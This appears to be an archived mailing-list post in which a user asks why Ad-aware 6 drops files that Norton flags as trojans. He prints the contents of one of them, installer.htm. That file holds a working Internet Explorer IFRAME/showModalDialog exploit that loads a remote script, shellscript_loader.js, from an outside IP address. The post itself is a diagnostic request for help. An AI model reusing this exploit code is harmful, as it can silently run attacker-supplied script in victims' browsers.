<<< Date Index >>>     <<< Thread Index >>>

Unusual Activity in Ad-aware 6 Personal, Build 6.181



Sorry about my previous post, Norton picked up the html code an filtered my
e-mail. Here is the original post without the html flags

Hello,

My apologise if I am posting in the wrong list but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.

I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:

rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A

rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A

Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:

exploit.chm
installer.htm
shellscript.js
shellscript_loader.js

In installer.htm, it appears to use one of the IE IFRAME exploits to
download the java script files.

cat installer.htm

<script language="Javascript">

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><
\/script>'";
    }

</script>

<script language="javascript">


setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp"
WIDTH=200 HEIGHT=200></IFRAME>');

</script>


The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A google search doesn't turn up any relation between this exploit
and Ad-aware so it could be something unique to my system but at this point
I am at a loss as to what it could be.

I also have an 'image' of my Windows XP Pro install in a VMware where I have
been testing SP2 and the files also exist there as well.

Any info would be appreciated.

Thanks,
Matt